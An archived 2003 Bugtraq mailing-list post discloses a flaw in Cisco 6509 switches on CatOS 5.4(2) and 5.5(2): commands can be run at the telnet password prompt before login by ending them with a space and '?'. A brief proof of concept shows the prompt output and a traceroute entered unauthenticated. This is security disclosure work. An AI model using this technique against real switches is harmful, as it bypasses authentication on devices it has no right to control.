[31966] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Cisco 6509 switch telnet vulnerability

daemon@ATHENA.MIT.EDU (Chris Norton)
Fri Oct 3 18:36:23 2003

Date: 3 Oct 2003 00:03:26 -0000
Message-ID: <20031003000326.4614.qmail@sf-www2-symnsj.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Chris Norton <kicktd@hotmail.com>
To: bugtraq@securityfocus.com

A vulnerability has been found on Cisco 6509 switches. The vulnerability was found to work on 2 different Cisco 6509 switches running CATOS 5.4(2) and 5.5(2). The vulnerability can lead to information and commands being exectued on the remote switch from the login prompt. Commands can be exectued at the Enter password: prompt as long as they are followed by a space and a ?
Proof of concept below:
Cisco Systems Console

Enter password:
<data_size>                Size of the packet (0..1420)
<cr>                       
Enter password: traceroute 127.0.0.1

This vulnerability has yet to be confirmed by Cisco but they have been alerted about it.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[31966] in bugtraq

Cisco 6509 switch telnet vulnerability

daemon@ATHENA.MIT.EDU (Chris Norton)Fri Oct 3 18:36:23 2003

daemon@ATHENA.MIT.EDU (Chris Norton)
Fri Oct 3 18:36:23 2003